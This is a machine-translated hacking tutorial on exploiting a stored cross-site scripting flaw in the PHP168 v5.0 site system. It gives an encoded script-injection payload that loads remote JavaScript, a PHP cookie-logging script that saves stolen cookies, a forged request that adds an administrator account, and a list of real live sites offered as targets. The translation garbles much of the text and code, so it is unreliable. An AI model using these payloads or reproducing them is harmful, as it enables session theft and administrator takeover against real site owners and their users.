Professional explanation of PHP168 XSS cross-site and Utilization

(1) software test environment and Establishment

Test environment: Local XAMPP 1.7.1

Test software: PHP168 full-site v5.0

Software http://down2.php168.com/v2008.rar

PHP. ini configuration: magic_quotes_gpc Off (On or Off does not affect persistent XSS); register_globals Off; safe_mode Off;

　(2) XSS cross-site infrastructure

1. XSS attack definition

XSS, also known as CSS (Cross Site Script), is short for Cross-Site scripting attacks. A malicious attacker inserts malicious html code into a Web page. When a user browses this page, the html code embedded in the Web page is executed, to achieve the Special Purpose of malicious users. XSS is a passive attack, because it is passive and difficult to use, so many people often call it harmful. In fact, many systems have XSS vulnerabilities, this article mainly studies the use of xss in the PHP168 whole site system.

　　2. How to Find XSS vulnerabilities

Generally, XSS attacks can be divided into two types: internal attacks, which mainly refer to the use of program vulnerabilities to construct cross-site statements, such as showerror of dvbbs. cross-Site vulnerabilities in asp. The other type is from external attacks. It mainly refers to constructing XSS Cross-Site vulnerability webpages or searching for webpages with cross-site vulnerabilities other than the target machines. For example, when we want to penetrate a website, we construct a webpage with cross-site vulnerabilities, and then construct cross-site statements. By combining other technologies, such as social engineering, the Administrator of the target server is spoofed to open it.

　3. How to Use

In traditional cross-site exploitation methods, attackers usually construct a cross-site webpage, and then put a cookie-collecting page in another space, next, we use other technologies to enable users to open cross-site pages to steal users' cookies for further attacks. I personally think this method is too backward, and you may know the disadvantages, because even if you collect cookies, you may not be able to penetrate further. The passwords in most cookies are encrypted, if you want cookie spoofing, you will also be subject to other conditions. The other idea proposed in this article solves the above problems to a certain extent. For individuals, a mature method is to construct a form through cross-site, and the content of the form is to obtain a high permission by using the backup function of the program or adding the administrator. (3) Cross-Site XSS

1. Obtain the XSS vulnerability address

XSS is also called Cross Site Scripting. There are two types: persistent and reflective. This article demonstrates persistent cross-site and simple use. In fact, it is based on our predecessors, and we are grateful for the selfless dedication of the ox. After installing php168, do not log on. Open the following URL: http: // localhost/php168/member/post. php? Job = postnew & fid = 2

You can log on without an administrator and directly post an article, as shown in figure 1.

　　

Figure 1 direct posting without verification

Note:

If you are testing on the actual network, you can use "php168/member/post. search for php as the key value, find the search result, view the result, as shown in 2, click the "post" link to enter the posting page. The obtained Fid is the correct ID. Otherwise, the obtained ID cannot open the page, as shown in 3. In the corresponding input box in Figure 3, enter the corresponding test value and publish the file. As shown in figure 4, the post operation is displayed. Click View to view the post you just posted, as shown in figure 5, the entire posting process does not require review and login.

　　

Figure 2 search for php168 posting address

　　

Figure 3 post directly

　　

Figure 4 Post successful

　　

Figure 5 view published posts

　2. Test XSS

On the post page, select the "source code" mode and add the following code to the content:

Click post. Let's see the article URL: http: // 127.0.0.1/php168/bencandy. php? Fid = 2 & aid = 4

The appearance of evil XSS, as shown in figure 6.

　　

Figure 6 find the evil XSS

　3. Remote inclusion of JS files

We remotely include JS files for attacks. The Code is as follows:

Src ="Javascript: S = document. createElement (script );

S. src = http: // 127.0.0.1/xss. js;

Document. body. appendChild (s); "/>

In this way, the code will be filtered out. If you do not convert the code, you can directly convert it to http://ha.ckers.org/xss.html?ipobfuscate.

The Code is as follows:

Src = "& # x6A & # x61 & # x76 & # x61 & # x73 & # x63 & # x72 & # x69 & # Corner Stone & # x74 & # x3A & # x73 & # x3D & # x64 & # x6F &

# X63 & # x75 & # x6D & # x65 & # x6E & # x74 & # x2E & # x63 & # x72 & # x65 & # x61 & # x74 & # x65 &# x45 & # x6C & # x65 &#

X6D & # x65 & # x6E & # x74 & # x28 & # x27script & # x27 );

S. src = http: // 127.0.0.1/xss. js;

Document. body. appendChild (s); "/>

In this way, we can directly edit our xss. js file to Crane the Administrator Cookie. Of course, there are more reflective models. The execution result is 7.

　　

Figure 7 XSS reading result

　4. Get Cookie

Edit the js file as follows:

Alert (document. cookie );

The local Cookie value is displayed, as shown in figure 8.

　　

Figure 8 obtain the local Cookie value

Of course, we hid the Cookie of the fishing administrator and did not test the official website. Please try it.

　5. Write the code to get the Cookie or directly add the Administrator

Compile the PHP file with the following code:

/* Auther: menzhi007 Blog: http://hi.baidu.com/menzhi007 */

$ Txtfile = "menzhi. php ";

$ Date = date ("Y-m-d-H: I: s ");

$ Cookie = $ _ GET [get];

$ Writeinfo = "{$ date} {$ cookie }";

$ Printer = fopen ($ txtfile, );

Fwrite ($ printer, $ writeinfo );

Fclose ($ printer );

?> Or add the Administrator directly. The Code is as follows:

Location. href = "http: // 127.0.0.1/php168/admin/index. php? Lfj = member & action = addmember & postdb % 5 Busername % 5D = menzhi007 & postdb % 5 Bpasswd % 5D = menzhi007 & postdb % 5Bpasswd2% 5D = menzhi007 & postdb % 5 Bgroupid % = 3 & postdb % 5 Bemail % 5D = menzhi007@163.com & Submit = % CC % E1 % BD % BB ";

I usually don't have time to access the Internet. Let's test it on your own. Official path: D: p8-serverwwwrootphp168_com

I have already notified the official team to fix the vulnerability. Do not destroy the Vulnerability (I regret it if I do not enter the official team ). (4) instance demonstration

Open the official homepage http://www.php168.com/biz/impower.php

Business authorization query, as shown in figure 9.

　　

Figure 9 obtain users using the php168 full-Site System

Let's pick up a few demonstration sites:

Http://www.3cq.org/member/post.php? Job = postnew & fid = 2

　　

Figure 10 demonstration site 1

Demo site 2:

Http://www.ccdv.cc/member/post.php? Job = postnew & fid = 2

　　

Figure 11 demonstration site 2